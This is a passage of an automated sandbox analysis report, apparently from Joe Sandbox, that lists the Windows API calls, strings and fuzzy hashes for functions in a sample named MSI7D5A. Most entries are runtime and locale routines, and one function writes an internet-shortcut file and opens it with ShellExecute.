                                                        • Part of subcall function 00A71C9A: EnterCriticalSection.KERNEL32(-00A9DE50,?,00A73576,?,00A9A078,0000000C,00A73841,?), ref: 00A71CA9
                                                      • EnumSystemLocalesW.KERNEL32(00A77125,00000001,00A9A1D8,0000000C,00A77554,00000000), ref: 00A7716A
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: ce5f0eb0f6da418e170422f3a8242d3c211f650528450974a9ce79eff01c3f3b
                                                      • Instruction ID: b6918d41c5e8415d4199ed99835d5883b9fec7347f7e3751db36a5e717783127
                                                      • Opcode Fuzzy Hash: ce5f0eb0f6da418e170422f3a8242d3c211f650528450974a9ce79eff01c3f3b
                                                      • Instruction Fuzzy Hash: 7AF04972B44200EFDB00DF98E946B9D77F0FB48722F10865AF419DB2A1EB7589018F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A757CC: GetLastError.KERNEL32(?,00000008,00A7AD4C), ref: 00A757D0
                                                        • Part of subcall function 00A757CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00A75872
                                                      • EnumSystemLocalesW.KERNEL32(00A7E01F,00000001,?,?,?,00A7E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A7E0FD
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 8dc6f82c583acf0abb442423a59a3579f53f0a1786eb198d42b10917834e5d6c
                                                      • Instruction ID: 9361163250455475fcced1ea248636068d38111c1ea0d610d107361db76e57a1
                                                      • Opcode Fuzzy Hash: 8dc6f82c583acf0abb442423a59a3579f53f0a1786eb198d42b10917834e5d6c
                                                      • Instruction Fuzzy Hash: C5F0E53A3402059BCB04EF35DC4966A7F95EFC5760F06C498EA098B651C6B5D883C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00A600E2,00000000,00000000,00000004,00A5ED14,00000000,00000004,00A5F127,00000000,00000000), ref: 00A62410
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: e4ce0bc826cb39ed61deb0bad88228d7275c55b724fad32e8707107e0aec8df3
                                                      • Instruction ID: cf12368a4e2442033710d5ed78cd88f19a5a2327e565524058e346b3788fb4b9
                                                      • Opcode Fuzzy Hash: e4ce0bc826cb39ed61deb0bad88228d7275c55b724fad32e8707107e0aec8df3
                                                      • Instruction Fuzzy Hash: 3EE0D832664105B6D7258BBD9E0FFBE76B8D700709F504151E902E40D1DEA1CA00A361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00A74E3F,?,20001004,00000000,00000002,?,?,00A74441), ref: 00A776E3
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 79cd40fd641aceb53fadbf4b0184a7f7c7166f3f367419f813f283a4c6f1af85
                                                      • Instruction ID: 5b9153a8d3e8c4d363618d5790f78f2df7334b5376cd44b62330dc1fb82290b8
                                                      • Opcode Fuzzy Hash: 79cd40fd641aceb53fadbf4b0184a7f7c7166f3f367419f813f283a4c6f1af85
                                                      • Instruction Fuzzy Hash: D4E04F3250862CBBCF126F61DD08AAE7E26FF44760F10C021FC1965121DB71CD21ABD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00A63077), ref: 00A63544
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0f204d255119c996b021e9bee1a070acc027d176606150b70da9389701ea0c59
                                                      • Instruction ID: a7085a955682f42de6e19af1085eaea0375d82ee78f9a7b9f16aadc0efb0ee7d
                                                      • Opcode Fuzzy Hash: 0f204d255119c996b021e9bee1a070acc027d176606150b70da9389701ea0c59
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00A62C98: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CA3
                                                        • Part of subcall function 00A62C98: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,?,00A423B6,00A9E638,838A949E,?,?,00A83D6D,000000FF), ref: 00A62CE0
                                                      • GetProcessHeap.KERNEL32 ref: 00A42365
                                                        • Part of subcall function 00A62C4E: EnterCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C58
                                                        • Part of subcall function 00A62C4E: LeaveCriticalSection.KERNEL32(00A9DD3C,?,?,00A42427,00A9E638,00A86B40), ref: 00A62C8B
                                                        • Part of subcall function 00A62C4E: RtlWakeAllConditionVariable.NTDLL ref: 00A62D02
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                      • String ID:
                                                      • API String ID: 325507722-0
                                                      • Opcode ID: 00937b814adc89663c1aa81fe9b3c3db12fb772f87c4a9cf941dfcbb6376e9e2
                                                      • Instruction ID: 0504229c6a2678a219fab91a9c77cac1d88f8ae5c89a28e12ab8e63ef7af3561
                                                      • Opcode Fuzzy Hash: 00937b814adc89663c1aa81fe9b3c3db12fb772f87c4a9cf941dfcbb6376e9e2
                                                      • Instruction Fuzzy Hash: 6D21ACB1B41680EFDB10DF98ED46B4977F0F724720F00061AE625972E2EFB059068B52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AllocHeap
                                                      • String ID:
                                                      • API String ID: 4292702814-0
                                                      • Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                      • Instruction ID: 635c01da13fd47fb6569600f131d305e91eba06c2e9995d7ef5d92162fdc0a06
                                                      • Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
                                                      • Instruction Fuzzy Hash: 21328D74A0021ADFCF24CFA8CD91ABEB7B5EF44304F14C169D949AB315D632AE46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                      • String ID:
                                                      • API String ID: 3471368781-0
                                                      • Opcode ID: b6b3994cc5f955dd5509a34dd0df2172c7c8322eb5e2b88f0b323a7ee94fd18e
                                                      • Instruction ID: 9c2d0e009fb98bcf341a53dbc827be5f96f40b1830d2a6d3182321863b2c6498
                                                      • Opcode Fuzzy Hash: b6b3994cc5f955dd5509a34dd0df2172c7c8322eb5e2b88f0b323a7ee94fd18e
                                                      • Instruction Fuzzy Hash: 51B1E5756007059BDB389F24CD92ABBB3B8FF84318F14C56DEA8B86580FA75E981C710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A6011D
                                                      • collate.LIBCPMT ref: 00A60126
                                                        • Part of subcall function 00A5EDF2: __EH_prolog3_GS.LIBCMT ref: 00A5EDF9
                                                        • Part of subcall function 00A5EDF2: __Getcoll.LIBCPMT ref: 00A5EE5D
                                                      • __Getcoll.LIBCPMT ref: 00A6016C
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60180
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60195
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A601D3
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A601E6
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6022C
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60260
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6031B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6032E
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6034B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60368
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60385
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A602BD
                                                        • Part of subcall function 00A48C20: std::_Lockit::_Lockit.LIBCPMT ref: 00A48C50
                                                        • Part of subcall function 00A48C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00A48C78
                                                      • numpunct.LIBCPMT ref: 00A603C4
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A603D4
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60418
                                                        • Part of subcall function 00A46330: LocalAlloc.KERNEL32(00000040,?,00A50E04,00000020,?,?,00A49942,00000000,838A949E,?,?,?,?,00A850DD,000000FF), ref: 00A46336
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A6042B
                                                      • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A60448
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                      • String ID:
                                                      • API String ID: 3717464618-0
                                                      • Opcode ID: f9c0803ba297e1abeb7edf2af7a0ce76b49793133768ef2936eb1b9567d210aa
                                                      • Instruction ID: 4270d4ff9a2a9c95488385db62ab30513204b8e11cc2cdb98a51d52e234a4b03
                                                      • Opcode Fuzzy Hash: f9c0803ba297e1abeb7edf2af7a0ce76b49793133768ef2936eb1b9567d210aa
                                                      • Instruction Fuzzy Hash: 2791F771D022116FEB24BFB44E46F7F7AB8EF81760F10452DF919AB281DE74994087A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00A4667E
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466D7
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466E2
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466FE
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A467DB
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A467E7
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00A849E5), ref: 00A4682F
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A4684A
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00A849E5), ref: 00A46867
                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A46891
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00A468D8
                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00A4692A
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A4695C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                      • API String ID: 2199533872-3004881174
                                                      • Opcode ID: a7a449d370538a29801da8cab272005f7f93bc28c828b135672ac7ca8cf97b36
                                                      • Instruction ID: cec1644803fe3bc7c7793a1dc75432dbae5cb37c98773be67c573a46769a362f
                                                      • Opcode Fuzzy Hash: a7a449d370538a29801da8cab272005f7f93bc28c828b135672ac7ca8cf97b36
                                                      • Instruction Fuzzy Hash: 39B14875904249AFEF20CF64CD86BEFBBB5EF86700F204119E514AB2C1D7B09A05C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00A9DD3C,00000FA0,?,?,00A62B6A), ref: 00A62B98
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A62B6A), ref: 00A62BA3
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A62B6A), ref: 00A62BB4
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A62BC6
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A62BD4
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A62B6A), ref: 00A62BF7
                                                      • DeleteCriticalSection.KERNEL32(00A9DD3C,00000007,?,?,00A62B6A), ref: 00A62C13
                                                      • CloseHandle.KERNEL32(00000000,?,?,00A62B6A), ref: 00A62C23
                                                      Strings
                                                      • kernel32.dll, xrefs: 00A62BAF
                                                      • WakeAllConditionVariable, xrefs: 00A62BCC
                                                      • SleepConditionVariableCS, xrefs: 00A62BC0
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A62B9E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: e525cf17705ffb879bd97a0c8ae641c60bc42c654ab614a3391764d82c8e86e3
                                                      • Instruction ID: 45fdb35eba507fe0f9443e82fb2540670b43375f27f2d09ab1de2f9616b220f3
                                                      • Opcode Fuzzy Hash: e525cf17705ffb879bd97a0c8ae641c60bc42c654ab614a3391764d82c8e86e3
                                                      • Instruction Fuzzy Hash: 11017175B46B11ABDB21AFB5AC0DB5A7B78EF90B51B200C11BD04D22A4DE78C8428761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00A65DAC
                                                      • type_info::operator==.LIBVCRUNTIME ref: 00A65DCE
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00A65EDD
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00A65FAF
                                                      • _UnwindNestedFrames.LIBCMT ref: 00A66033
                                                      • CallUnexpected.LIBVCRUNTIME ref: 00A6604E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 55e8b9f2793f7f37cec6fdcdbdfeafdbafb7db3fbd6c0597defac4444cbc9068
                                                      • Instruction ID: 2e6673b26b175593b216e85792ad64e00ae20ce456ac8f087a30e348f7806aaf
                                                      • Opcode Fuzzy Hash: 55e8b9f2793f7f37cec6fdcdbdfeafdbafb7db3fbd6c0597defac4444cbc9068
                                                      • Instruction Fuzzy Hash: CEB17972C00619EFCF29DFA4CA819AEBBB5FF18310F14816AE8156B252D731DE51CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,838A949E,?,?,?), ref: 00A442D2
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,838A949E,?,?,?), ref: 00A442F3
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44326
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44337
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44355
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44371
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44399
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443B5
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443D3
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443EF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$Process$OpenTimes
                                                      • String ID:
                                                      • API String ID: 1711917922-0
                                                      • Opcode ID: 47e571594699a648911c3e1f660b9ecb57afbf96c1a10c9a55327d4c274002e0
                                                      • Instruction ID: 46c67fd8f33adac7bf41e7f2355a085dd6daae32ca664d0f8baa9784a9f72e17
                                                      • Opcode Fuzzy Hash: 47e571594699a648911c3e1f660b9ecb57afbf96c1a10c9a55327d4c274002e0
                                                      • Instruction Fuzzy Hash: F6515975E01618EFDB10CF98D984BAEBBF4BF88B14F244219E524BB280C77559068BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5BBC4
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1538362411-2891247106
                                                      • Opcode ID: ef33554fadbbd12dd4d8c5c870c6da9a3af893aa97e4f93eca331b345813a46b
                                                      • Instruction ID: b589a7b7297bd7045992fca36312dd8de92af04dde201ef76e90176c7accb711
                                                      • Opcode Fuzzy Hash: ef33554fadbbd12dd4d8c5c870c6da9a3af893aa97e4f93eca331b345813a46b
                                                      • Instruction Fuzzy Hash: 64B17D7251010AABCF19DF68CE56EFE3BB9FB18306F144119FE06A6291D731DA18DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A60CA4
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1383202999-2891247106
                                                      • Opcode ID: 9cc28eb088f57646b1bb90c629564b4bf78806f704136ba83829b843337ba0d6
                                                      • Instruction ID: bb6f0e23224b628d0686d98152a45b0e1f9593eb396863db59b69b06c82589b8
                                                      • Opcode Fuzzy Hash: 9cc28eb088f57646b1bb90c629564b4bf78806f704136ba83829b843337ba0d6
                                                      • Instruction Fuzzy Hash: 8DB1AD7550020AEFCF29DFA8C959DFF3BB9FB04300F154519FA06A6291D632DA90DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5BF85
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Strings
                                                      Memory Dump Source
